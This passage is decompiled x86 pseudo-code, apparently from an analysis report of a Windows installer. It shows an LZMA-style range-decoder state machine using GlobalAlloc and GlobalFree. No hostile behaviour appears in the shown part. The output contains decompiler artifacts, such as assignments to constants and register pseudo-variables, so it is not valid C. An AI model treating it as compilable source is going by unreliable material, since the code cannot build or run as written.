                                                            											} else {
                                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t613 - 0x6c);
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												 *(_t613 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            											_t45 = _t613 - 0x48;
                                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t613 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											_t546 =  *(_t613 - 0x40);
                                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                                            												L20:
                                                            												 *(_t613 - 0x48) = 5;
                                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											 *(_t613 - 0x74) = _t546;
                                                            											if( *(_t613 - 8) != 0) {
                                                            												GlobalFree( *(_t613 - 8));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            											 *(_t613 - 8) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            											 *(_t613 - 0x84) = 6;
                                                            											 *(_t613 - 0x4c) = _t553;
                                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                            											 *(_t613 - 0x54) = _t606;
                                                            											goto L133;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t613 - 0x6c);
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												 *(_t613 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											_t67 = _t613 - 0x70;
                                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            											if( *(_t613 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t531 =  *_t606;
                                                            											_t589 = _t531 & 0x0000ffff;
                                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            											if( *(_t613 - 0xc) >= _t565) {
                                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            												 *(_t613 - 0x40) = 1;
                                                            												_t532 = _t531 - (_t531 >> 5);
                                                            												 *_t606 = _t532;
                                                            											} else {
                                                            												 *(_t613 - 0x10) = _t565;
                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            											}
                                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											}
                                                            										case 5:
                                                            											goto L137;
                                                            										case 6:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											while(1) {
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											}
                                                            										case 8:
                                                            											goto L0;
                                                            										case 9:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L89;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t258;
                                                            											0 | _t258 = _t258 + _t258 + 9;
                                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            											goto L75;
                                                            										case 0xa:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L88;
                                                            										case 0xb:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L88:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L89:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L99:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t334 = __ebp - 0x70;
                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t334;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L101;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L109:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t365 = __ebp - 0x70;
                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t365;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L111;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											while(1) {
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											}
                                                            										case 0x12:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 0x58);
                                                            												 *(__ebp - 0x84) = 0x13;
                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											__eflags = __eax;
                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            											goto L130;
                                                            										case 0x13:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												L144:
                                                            												 *(__ebp - 0x7c) = 0x14;
                                                            												goto L145;
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											L130:
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											 *(__ebp - 0x40) = 3;
                                                            											goto L144;
                                                            										case 0x14:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											 *(_t613 - 0x88) = _t533;
                                                            											goto L1;
                                                            										case 0x15:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L120;
                                                            										case 0x16:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__eflags = __eax - 4;
                                                            											if(__eax >= 4) {
                                                            												_push(3);
                                                            												_pop(__eax);
                                                            											}
                                                            											__ecx =  *(__ebp - 4);
                                                            											 *(__ebp - 0x40) = 6;
                                                            											__eax = __eax << 7;
                                                            											 *(__ebp - 0x7c) = 0x19;
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											goto L145;
                                                            										case 0x17:
                                                            											L145:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											 *(__ebp - 0x50) = 1;
                                                            											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            											goto L149;
                                                            										case 0x18:
                                                            											L146:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x18;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t484 = __ebp - 0x70;
                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t484;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L148:
                                                            											_t487 = __ebp - 0x48;
                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                            											__eflags =  *_t487;
                                                            											L149:
                                                            											__eflags =  *(__ebp - 0x48);
                                                            											if( *(__ebp - 0x48) <= 0) {
                                                            												__ecx =  *(__ebp - 0x40);
                                                            												__ebx =  *(__ebp - 0x50);
                                                            												0 = 1;
                                                            												__eax = 1 << __cl;
                                                            												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            												__eax =  *(__ebp - 0x7c);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												while(1) {
                                                            													 *(_t613 - 0x88) = _t533;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x50);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__esi = __edx + __eax;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__ax =  *__esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												__cx = __ax >> 5;
                                                            												__eax = __eax - __ecx;
                                                            												__edx = __edx + 1;
                                                            												__eflags = __edx;
                                                            												 *__esi = __ax;
                                                            												 *(__ebp - 0x50) = __edx;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L148;
                                                            											} else {
                                                            												goto L146;
                                                            											}
                                                            										case 0x19:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L119:
                                                            												_t393 = __ebp - 0x2c;
                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t393;
                                                            												L120:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t400 = __ebp - 0x60;
                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t400;
                                                            												goto L123;
                                                            											}
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L102:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L108:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
